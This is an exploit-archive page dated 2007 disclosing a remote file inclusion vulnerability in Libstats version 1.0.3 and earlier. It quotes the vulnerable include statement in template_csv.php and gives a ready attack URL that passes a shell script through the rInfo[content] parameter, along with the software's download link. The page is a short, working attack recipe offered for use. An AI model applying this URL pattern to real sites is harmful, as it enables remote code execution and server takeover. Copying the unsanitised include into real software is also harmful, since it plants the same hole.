Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability
# Published : 2007-05-18
# Author : xoron
# Previous Title : SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities
# Next Title : MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability

#Libstats 1.0.3 <=  Remote File Inclusion Vulnerability
#
#Vuln Code
##############################################################################################
#
#ERROR1:template_csv.php
#
#include $rInfo['content'];   <<< RFI CODE
#
#
#BUG1:
#
#Example1:http://site.com/path/template_csv.php?rInfo[content]=[[Sh3LL Script]]
#
#Script Download
##############################################################################################
#
#http://www.wendt.wisc.edu/projects/systems/libstats/releases/libstats-1.0.3.zip
#
##############################################################################################
#
#Cyber-Security <> Cyber-warrior.org
#
##############################################################################################

# www.Syue.com [2007-05-18]